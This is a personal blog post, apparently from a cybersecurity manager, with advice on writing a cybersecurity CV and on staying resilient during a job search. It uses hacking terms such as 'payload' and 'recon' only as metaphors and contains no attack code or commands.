13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>To summarize, this is the journey of the post:</p><ul><li><p><a href="https://www.quasarops.com/i/159888925/so-your-cv-uh">So your CV uh?</a></p></li><li><p><a href="https://www.quasarops.com/i/159888925/strategy-crafting-a-standout-cybersecurity-cv-a-la-imperfect">Strategy 1. Crafting a Standout Cybersecurity CV &#224; la Imperfect</a></p><ul><li><p><a href="https://www.quasarops.com/i/159888925/first-impressions">First Impressions</a></p></li><li><p><a href="https://www.quasarops.com/i/159888925/skill-and-proficiency">Skill &amp; Proficiency</a></p></li><li><p><a href="https://www.quasarops.com/i/159888925/positioning-yourself-the-long-game">Positioning Yourself: The Long Game</a></p></li><li><p><a href="https://www.quasarops.com/i/159888925/presenting-information">Presenting Information</a></p></li><li><p><a href="https://www.quasarops.com/i/159888925/impact-outcomes-output">Impact != Outcomes != Output</a></p></li><li><p><a href="https://www.quasarops.com/i/159888925/cv-operational-security-and-privacy">CV Operational Security &amp; Privacy</a></p></li><li><p><a href="https://www.quasarops.com/i/159888925/sprinkle-some-magic">Sprinkle some Magic</a></p></li></ul></li><li><p><a href="https://www.quasarops.com/i/159888925/strategy-resilience-tactics">Strategy 2. Resilience Tactics.</a></p><ul><li><p><a href="https://www.quasarops.com/i/159888925/resilience-tactic-anticipate-scouting-in-a-shifting-landscape">Resilience Tactic 1: Anticipate. Scouting in a Shifting Landscape</a></p></li><li><p><a href="https://www.quasarops.com/i/159888925/resilience-tactic-withstand-tuning-into-your-own-signal-amidst-the-noise">Resilience Tactic 2: Withstand. Tuning into Your Own Signal Amidst the Noise</a></p></li><li><p><a href="https://www.quasarops.com/i/159888925/resilience-tactic-recover-recalibrating-in-the-quiet-spaces">Resilience Tactic 3: Recover. Recalibrating in the Quiet Spaces</a></p></li><li><p><a href="https://www.quasarops.com/i/159888925/resilience-tactic-adapt-strategy-as-a-living-conversation">Resilience Tactic 4: Adapt. Strategy as a Living Conversation</a></p></li></ul></li><li><p><a href="https://www.quasarops.com/i/159888925/so-now-what">So now what?</a></p></li></ul><h2>So your CV uh?</h2><p>Throughout my career, I've never walked out of an interview feeling I smashed it.</p><p>Interviewing is hard, it&#8217;s a vulnerable experience, exposing yourself to evaluating criteria that are never fully knowable, impostor syndrome is around the corner and you are constantly second-guessing your hard earned skills.</p><p>Hey, we've all been there and probably will be many times throughout our careers. But you can learn a few tactics and techniques to navigate these moments more easily.</p><p>One powerful approach is reducing the distance between your professional persona (like your CV) and who you genuinely are. This will foster authenticity and confidence.</p><p>Another powerful approach is <strong>building practical resilience techniques</strong> to help you bounce back from setbacks and stay grounded: <strong>Anticipate</strong>, <strong>Withstand</strong>, <strong>Recover</strong> and <strong>Adapt</strong>.</p><p>We'll explore both approaches in this post.</p><p>When we dive into the CV specifics, we'll focus on making it a true reflection of <em>you </em>without compromising on sending a powerful message. We have to forget about generic lists. We'll cover how to pinpoint and articulate your <em>genuine</em> accomplishments, quantify your <em>impact</em> authentically, and convey the real <em>value</em> of your skill sets. The goal of a CV that is not to list skills, but to tell your unique professional story.</p><p>In essense: <em>we need to craft a hella good CV that tells your story right. </em>However, it&#8217;s not all about just optimizing a CV.</p><p>There is a dimension of <em>being</em> in how you perceive and present yourself at work. It's all about resonance: who you are, who you aspire to be, the gadgets and tricks you pick up along the way, the artifacts you build to map the world around you and solve real problems.</p><p>True resonance occurs when your personal values and professional aspirations are in alignment. It's a harmonic convergence that creates a powerful connection. When your frequencies align, your message is not just heard, but deeply felt. Have you ever thought about the message you are projecting?</p><p>For many of us, pursuing the alignment of personal values and professional aspirations is an exciting adventure. A journey of wisdom and insight.</p><p>Now the obligatory disclaimer.</p><p>These are my personal opinions and mine only, they don&#8217;t reflect those of my employer. I am by no means an expert in all things related to a CV or how to "ace" your job interviews and this shouldn&#8217;t be taken as super-duper professional advice.</p><p>I will simply offer my humble and imperfect advice from the POV of someone who has seen 100s of CVs + interviewed + hired lots of people along the years in different continents, and someone who has been there and done that as a job seeker too.</p><h2>Strategy 1. Crafting a Standout Cybersecurity CV &#224; la Imperfect</h2><p>Do you know what CV stands for? <em>Curriculum Vitae</em>. Supposedly the &#8220;Course of Life&#8221;. If it were a movie, it would be very, very, very long!</p><p>In reality, if the course of your life is like a nine part StarWars saga, your CV is nothing more than the official trailer. It&#8217;s a pitch, for the purposes of convincing prospective investors (employers) that it&#8217;s worth hearing what you have to say.</p><p>So, what you'll find here isn't a step-by-step recipe guaranteeing the ultimate CV. Think of it more as a collection of artifacts, navigational aids perhaps, gathered from my own winding path through this landscape. You may find a rusty compass that needs tuning, I can&#8217;t fix it for you, that&#8217;s your job.</p><p>My experience, like anyone's, is a unique journey, not a universal blueprint. </p><p>It's crucial you discern for yourself what resonates, what feels authentic and useful. Approach these ideas not as rigid directives, but as potential tools, perhaps even odd-shaped keys you might try in the locks you encounter.</p><h3>First Impressions</h3><p><strong>Key Idea:</strong> Work on your introductory section, a single high-impact paragraph, an elevator pitch. In today's distraction economy, people's <em>brain-cache</em> is full to the brim by Instagram posts, TikTok videos, Twitter/BlueSky/Mastodon short posts, and every other kind of <em>super-duper-urgent-FOMO-key-information</em> platforms offer out there. If you want to stand out, you need a way to encapsulate your profile in a paragraph or two.</p><ul><li><p><strong>Do:</strong></p><ul><li><p>Start your CV with a paragraph or two summarizing your profile and experience.</p></li><li><p>Focus on your unique value proposition. What makes you stand out from other candidates?</p></li><li><p>Show personality, but keep it professional. Let your passion and enthusiasm shine through.</p></li></ul></li><li><p><strong>Avoid:</strong></p><ul><li><p>Using LLM to write your whole story. At least not without heavily reviewing, tweaking, editing to make sure it reflects you. You definitively don't want to sound so polished that any aspect of what makes you "you" has been sanitised.</p></li><li><p>Putting your cover letter as the first page of your CV.</p></li><li><p>Jumping straight into your first job with no context or introduction.</p></li></ul></li></ul><h3>Skill &amp; Proficiency</h3><p><strong>Key Idea:</strong> Nowadays the word "senior", "manager" or "expert" can mean anything depending on the context. I see people that are <em>seniors</em> after 6 months of experience, and <em>experts</em> in DevOps that don't know what Terraform or Ansible are. Come up with your own scale to break down skill and proficiency.</p><ul><li><p><strong>Do:</strong></p><ul><li><p><strong>Come up with your own scale to break down skill and proficiency</strong>. Example Aware, Exposure, Proficient, Advanced. You can use existing models too like the <a href="https://www.wikiwand.com/en/articles/Dreyfus_model_of_skill_acquisition">Dreyfus Model of Skill Acquisition</a>. Whatever it is, make sure that it&#8217;s a relative way of scoring your skills in particular domains.</p></li><li><p><strong>Focus on three core skill</strong>s, and then other skills that are one or two degrees of separation from your core skills and subservient to them. Think streams feeding a river.</p></li><li><p><strong>Non-technical skills are super important</strong>. Beyond the technical artifacts and exploits, consider the connective tissue, the human protocols. Your mastery needs conduits to the wider ecosystem. Can you act as an interpreter across tribal boundaries, making the technical legible to those outside our specific domain? Can you shape understanding through well-structured written accounts, turning raw data into actionable insight?</p></li><li><p><strong>Reflect on moments where you subtly shifted the momentum</strong>, influencing key figures not through force, but through resonance and clarity. Have you shared your own hard-won wisdom through mentoring, or shouldered the responsibility of leadership, guiding others through the fog? Demonstrating this side of your practice is important, it shows you understand the whole system, not just the code.</p></li></ul></li><li><p><strong>Avoid:</strong></p><ul><li><p><strong>Portraying yourself as an absolute senior in everything</strong>. Nobody is. If you only list your best skills and you rate yourself the highest in all of them it may come across as fake. Seek a genuine representation of yourself, including skills that you are somehow proficient, it shows you are expanding and developing in other areas.</p></li></ul></li></ul><h3>Positioning Yourself: The Long Game</h3><p><strong>Key Idea:</strong> One thing is for your CV to make it through, another thing is to get noticed, and another one is to stand out.</p><p>I remember a post I read somewhere where someone compared getting an interview with penetration testing or social engineering. It was hilarious, it rang true and it was a really cool analogy. I can't remember who said it (and if you find that post please reach out so I can provide attribution!) but it went something like this:</p><ul><li><p>Perform reconnaissance, gathering information about the company culture and the specific role, while simultaneously ensuring your credentials are tailored to it.</p></li><li><p>Your CV is your payload. You want to deliver your payload by employing the right keywords that will get you past the automation bot or the human firewall.</p></li><li><p>Once your payload has landed, you need to employ gentle "nudges" to get someone to read it (i.e. execute it by loading at least your Name and Last Name in their running memory). Reach out to the recruiter, send an email to a contact address, call the person that acted as your referral. In essence: engage, don't sit there waiting.</p></li></ul><p>What this analogy is telling us is that you need to play a strategic positional game. It's a long game. Starting now would be a good idea &#9752;&#65039;.</p><p>It's about positioning yourself, your assets (skills, experience, proficiencies, tradecraft) and your allies (network) in a way that will help you achieve your long term goals.</p><p>However, there is a catch: pursue all these things with genuine commitment to becoming your sincere and best self. Cultivate a meaningful profile oriented towards relevance and self-awareness. Otherwise it will feel like wearing a suit that is two sizes up or down, or wearing clothes you hate: you will feel uncomfortable, it won't generate resonance.</p><p>It's really easy to tell when a profile is simply a SEO-optimized, shallow applied recipe of "best practice" rules for "success".</p><ul><li><p><strong>Do:</strong></p><ul><li><p><strong>Be imperfect, be genuine</strong>, stay committed to purpose and relevance realization.</p></li><li><p><strong>Play the long positional game</strong>, talk to people, go to events, network.</p></li><li><p><strong>Build a strong online presence</strong>. Optimize your LinkedIn profile, put work into a portfolio (a single python script in a repo, a blog post that shows your opinions about a topic, a CTF challenge you solved, etc.), and contribute to relevant online communities.</p></li><li><p><strong>Develop a personal brand</strong> that highlights your unique strengths and expertise. (This is your "signature exploit" - what makes you stand out?)</p></li></ul></li><li><p><strong>Avoid:</strong></p><ul><li><p><strong>Neglecting your network</strong>. Even casual acquaintances can provide valuable leads.</p></li><li><p><strong>Engaging people with a purely instrumental approach</strong>. People can tell, your energy will give you away. You won't forge long lasting connections which are the long burning logs you need to survive when it rains.</p></li><li><p><strong>Burning bridge</strong>s. Maintain professional relationships, even with people you don't particularly like. Be stoic here, don't meander in low level emotions. It's hard, I know, but the less you ruminate on past feuds the more your mind is free to perceive new patterns that lead to better opportunities. Focus on forward momentum, not past conflicts.</p></li><li><p><strong>Assuming that your work speaks for itself</strong>, make sure that it is seen in the right circles.</p></li><li><p>Putting effort into crafting a professional self <strong>that doesn't ring true</strong>.</p></li></ul></li></ul><h3>Presenting Information</h3><p>Remember, <strong>we live in a distraction economy</strong>. Every App and Ad out there is trying to capture not just your attention <em>but that of your prospective employer</em>. It is sad, but it is the reality of current times. I read this quote on the weekend that explains it all:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!J0pm!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F242ea151-092e-4587-8f7e-ede1fba28770_952x403.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!J0pm!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F242ea151-092e-4587-8f7e-ede1fba28770_952x403.jpeg 424w, https://substackcdn.com/image/fetch/$s_!J0pm!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F242ea151-092e-4587-8f7e-ede1fba28770_952x403.jpeg 848w, https://substackcdn.com/image/fetch/$s_!J0pm!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F242ea151-092e-4587-8f7e-ede1fba28770_952x403.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!J0pm!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F242ea151-092e-4587-8f7e-ede1fba28770_952x403.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!J0pm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F242ea151-092e-4587-8f7e-ede1fba28770_952x403.jpeg" width="584" height="247.21848739495798" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/242ea151-092e-4587-8f7e-ede1fba28770_952x403.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:403,&quot;width&quot;:952,&quot;resizeWidth&quot;:584,&quot;bytes&quot;:122218,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.quasarops.com/i/159888925?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F242ea151-092e-4587-8f7e-ede1fba28770_952x403.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!J0pm!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F242ea151-092e-4587-8f7e-ede1fba28770_952x403.jpeg 424w, https://substackcdn.com/image/fetch/$s_!J0pm!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F242ea151-092e-4587-8f7e-ede1fba28770_952x403.jpeg 848w, https://substackcdn.com/image/fetch/$s_!J0pm!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F242ea151-092e-4587-8f7e-ede1fba28770_952x403.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!J0pm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F242ea151-092e-4587-8f7e-ede1fba28770_952x403.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>In these post-modern times, f you want your CV to stand out, it has to be visually appealing, and have an easily digestible format. Think of it as presenting a well-organized incident report &#8211; clear, concise, and impactful.</p><p><strong>Think of your first page in the CV as your landing page</strong>. How do you want that to look like? The first page should summarize YOU.</p><p>I tend to imagine dashboards. Some Managers will love that, some won't. It's up to you to do some research and come up with a style that caters for multiple audiences or that is heavily tailored to a specific scenario.</p><p>Personally, I prefer coming up with a unified style that caters for most audiences but can be slightly tweaked if necessary.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!FdyF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5acbb2f-c2c6-4862-8f2d-ef5f4526fa2b_1024x1024.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!FdyF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5acbb2f-c2c6-4862-8f2d-ef5f4526fa2b_1024x1024.webp 424w, https://substackcdn.com/image/fetch/$s_!FdyF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5acbb2f-c2c6-4862-8f2d-ef5f4526fa2b_1024x1024.webp 848w, https://substackcdn.com/image/fetch/$s_!FdyF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5acbb2f-c2c6-4862-8f2d-ef5f4526fa2b_1024x1024.webp 1272w, https://substackcdn.com/image/fetch/$s_!FdyF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5acbb2f-c2c6-4862-8f2d-ef5f4526fa2b_1024x1024.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!FdyF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5acbb2f-c2c6-4862-8f2d-ef5f4526fa2b_1024x1024.webp" width="404" height="404" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d5acbb2f-c2c6-4862-8f2d-ef5f4526fa2b_1024x1024.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:404,&quot;bytes&quot;:263028,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/webp&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.quasarops.com/i/159888925?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5acbb2f-c2c6-4862-8f2d-ef5f4526fa2b_1024x1024.webp&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!FdyF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5acbb2f-c2c6-4862-8f2d-ef5f4526fa2b_1024x1024.webp 424w, https://substackcdn.com/image/fetch/$s_!FdyF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5acbb2f-c2c6-4862-8f2d-ef5f4526fa2b_1024x1024.webp 848w, https://substackcdn.com/image/fetch/$s_!FdyF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5acbb2f-c2c6-4862-8f2d-ef5f4526fa2b_1024x1024.webp 1272w, https://substackcdn.com/image/fetch/$s_!FdyF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5acbb2f-c2c6-4862-8f2d-ef5f4526fa2b_1024x1024.webp 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><ul><li><p><strong>Do:</strong></p><ul><li><p><strong>Prioritize Readability</strong>. Use clear, consistent formatting with ample white space. Employ bullet points, headings, and subheadings to break up text.</p></li><li><p><strong>Don't be boring</strong>. Provide visuals, graphs, etc. to portrait things like skills and achievements.</p></li><li><p><strong>Highlight Relevant Certifications and Training:</strong> Prominently display your certifications and any specialized training you've completed.</p></li><li><p><strong>Leverage Icons and Emojis:</strong> Use relevant icons or emojis to draw attention to specific sections or skills, like a shield for security or a lock for encryption.</p></li></ul></li><li><p><strong>Avoid:</strong></p><ul><li><p><strong>A wall of text</strong>. Dense paragraphs are difficult to read and can overwhelm the recruiter or hiring manager.</p></li><li><p><strong>Generic Language:</strong> Avoid vague terms like "team player" or "problem solver", these are commonplace cliches. Instead, go quirky, re-imagine the cliche. You could say <em>bigger-picturist</em>, <em>exponential troubleshooter</em> or <em>anomaly detective</em> instead of "problem solver". If you are not comfortable with this or it feels untrue, way off brand, then provide concrete examples that demonstrate the concept.</p></li><li><p>Using too much &#8220;very&#8221; everywhere. Yeah I am guilty of that! You know what rocks? This website: <a href="https://www.losethevery.com">www.losethevery.com</a></p></li><li><p><strong>Minimal separation</strong> between lines, this hinders readability.</p></li><li><p><strong>Inconsistent Formatting:</strong> Inconsistencies in font, spacing, or style can make your CV look unprofessional.</p></li><li><p><strong>Using too many colours:</strong> Keep the colour palette harmonious. You can use sites like <a href="https://coolors.co/">coolors.co</a> to generate nice colour palettes!</p></li></ul></li></ul><h3>Impact != Outcomes != Output</h3><p><strong>Key Idea:</strong> People confuse Outputs with Outcomes and these ones with Impact.</p><p>An output is something you produce as a result of an action or units of work like a pentest report, a new detection rule, a threat actor profile report, etc.</p><p>An outcome is a measurable improvement as a result of your actions and outputs. A specific result that achieves something meaningful for stakeholders, it is immediate and tangible, it answers the question "<strong>so what?</strong>". Think about the "KR" (Key Result) in OKR. E.g. your pentest report might help inform key stakeholders of critical business vulnerabilities, your new detection rule increases the coverage for the early identification of a threat actor technique of key importance to the business, your threat actor profile report provides key insight into priority areas for red teaming, threat hunting, driving effort towards high priority threats.</p><p>Impact is going one level up from outcomes and looking at the bigger picture, it's about answering the question "<strong>what strategic goal are you contributing towards?</strong>". Think about the "O" (Objective) in OKR.</p><p>In a CV, you may not need to refer much to impact, but definitively focus on showing "outcomes", because those communicate your value add.</p><ul><li><p><strong>Do:</strong></p><ul><li><p><strong>Think STAR</strong> (situation, task, action, result). For each current and past job experiences, add a short paragraph around outcomes, not just a list of tasks you performed.</p></li><li><p><strong>Quantify Outcomes and Impact Whenever Possible:</strong> Use numbers, percentages, and specific metrics to demonstrate the value of your work. For example, "Reduced critical vulnerabilities by 30%, minimizing potential financial losses."</p></li><li><p><strong>Show the "Ripple Effect":</strong> Whenever possible, describe how your actions positively influenced stakeholders and/or helped solved other secondary problems. This shows you are a person capable of high-ROI. Your outcomes don't need to be spectacular or intricate, they simply need to express positive influence on results.</p></li><li><p><strong>Use Action Verbs That Highlight Impact:</strong> Use verbs like "reduced," "improved," "enabled," "protected," "enhanced," and "strengthened" to emphasize the positive effects of your work. Yeah <em>these are boring verbs</em>, but they seem to stick in the business world of cyber, and Managers -like yours truly- are programmed to pay attention to these.</p></li></ul></li><li><p><strong>Avoid:</strong></p><ul><li><p><strong>A Shopping List of Tasks:</strong> Don't simply list the tasks you performed. Focus on the results and their significance. You can do tasks and activities, but connect them to the bigger picture.</p></li><li><p><strong>Ignoring the "So What?" Question</strong>: If you can't answer "<em>so what?</em>" about your work, it's likely the hiring manager won't either. Without the "<em>so what?</em>" it's just an output, and not an outcome or impact.</p></li><li><p><strong>Overusing Jargon without Context:</strong> While industry terminology is important, explain the context and impact of your work in a way that non-technical stakeholders can understand.</p></li></ul></li></ul><h3>CV Operational Security &amp; Privacy</h3><p><strong>Key Idea:</strong> Your CVs will be exposed to a high quantity of people over the course of your professional career. There are details that are relevant to your professional profile and other details that aren't.</p><ul><li><p><strong>Do:</strong></p><ul><li><p>Provide relevant information about your profile in the industry, your experience, influence and impact.</p></li></ul></li><li><p><strong>Avoid:</strong></p><ul><li><p><strong>Exposing your references or contacts unnecessarily</strong>, their private contact details shouldn't be broadcasted to the world. Instead, state they can be provided upon request.</p></li></ul></li></ul><h3>Sprinkle some Magic</h3><p><strong>Key Idea:</strong> This is absolutely optional. Some companies will love it, some will hate it. Do your research, understand what kind of company you are applying to and then make a decision about how quirky your CV should be.</p><ul><li><p><strong>Consider:</strong></p><ul><li><p>Add a top 5 of the books you most enjoy, this will give your employer a sense of your level of engagement with the field. It doesn't matter "what your read" as long as it's a window into your intellectual interests, the things you are passionate to understand deeper.</p></li><li><p>What's your most treasured hobby and why?</p></li><li><p>What podcast do you love?</p></li><li><p>What are the tabs you always have opened on your web browser?</p></li></ul></li></ul><h2>Strategy 2. Resilience Tactics.</h2><p>Even with the most impressive CV, the most awesome skills and certs and the most polished writing, you will fail, many times.</p><p>Don't let this discourage you, nothing of true value comes easy. The payoff you will get once you land a job will greatly outweigh any strenuous effort made in service of that goal.</p><p>In <a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v2r1.pdf">Developing Cyber-Resilient Systems - NIST 800-160v2</a> there are several strategies that mimic from the organic world into the machine world, and can be <a href="https://www.wikiwand.com/en/articles/Exaptation">exapted</a> and re-applied to your life. These are: <strong>Anticipate</strong>, <strong>Withstand</strong>, <strong>Recover</strong> and <strong>Adapt</strong>. I will attempt to shed some light into how I think of these in the professional world.</p><blockquote><p>&#10024;Warning, what follows is not for everyone. It's a sneak peak into some of my implicit sense-making algorithms. Challenging to put in words. There is some oblique artistry involved, rich in metaphors and philosophical gardening. And, there is some antimemetics involved.</p></blockquote><h3>Resilience Tactic 1: Anticipate. Scouting in a Shifting Landscape</h3><p>Right then. Have you ever felt lost? I have. It's part of the journey. Embarking on a job hunt feels less like charting a known course and more like stepping into a fog where the landmarks occasionally rearrange themselves.</p><p>To <strong>Anticipate</strong> here isn&#8217;t about pretending you have perfect foresight (best to leave this to overly confident strategists). It&#8217;s about acknowledging the <em>ambiguity</em> and <em>uncertainty</em> of your journey while still doing your groundwork.</p><p>When lost, stick to the fundamentals, play the long positional game, the goal will come &#9917;. Figure out what skills are actually in demand versus buzzword bingo, and know what <em>you</em> bring to the table.</p><p>Do the recon, yes &#8211; get a feel for the prevailing currents in your field, decipher the coded language of job descriptions (what are they <em>really</em> asking for?), <em>and ready your personal grimoire</em> (resume, GitHub projects, profile, conversational gambits). These will become your <a href="https://www.dndbeyond.com/magic-items/4617-deck-of-many-things">deck of many things</a>.</p><p>However, hold these cards loosely. Imagine contingencies not merely as backups, but as potential openings to adjacent possibles you hadn't considered, <em>yet</em>.</p><p><strong>Most importantly: cultivate your inner stance</strong>. Soak up <a href="https://dailystoic.com/9-core-stoic-beliefs/">the teachings of the stoics</a>. Expect friction, rejection &#8211; the system's background radiation. See it not as a judgment, but as noisy data from a complex, often unpredictable machine sustained by a set of practices you won't always comprehend.</p><p>It&#8217;s about <strong>cultivating readiness for emergence</strong>, not just <strong>optimizing for the most probable</strong> dice rolls.</p><p>We live in a world of over-optimizing gurus that want to sell you a straight line between point A and point B. In real life, nothing is so linear.</p><p>Non-linearity, obliquity, zig-zags, one step back and two steps forward: these are the pivoting techniques you need to integrate into your deck of many things.</p><p>Optimization for an outcome too early may put you in over-fitting scenarios, collapsing the possibility space, unable to grok the wider possibilities out there. But most of all, if you follow the bible of each and every optimizer out there, you will curtail the unfolding of who <strong>you</strong> are, undermining the precious mana of internal motivation! As Brian Klass puts it in a great essay:</p><div class="pullquote"><p>"This isn&#8217;t an invitation to resigned complacency, but rather a corrective compass: a reminder that personal striving should be guided by internal motivation, not to satisfy some unicorn-like social fantasy about the perfectly optimized life&#8212;astonishingly efficient, ruthlessly goal-oriented, and utterly nightmarish." 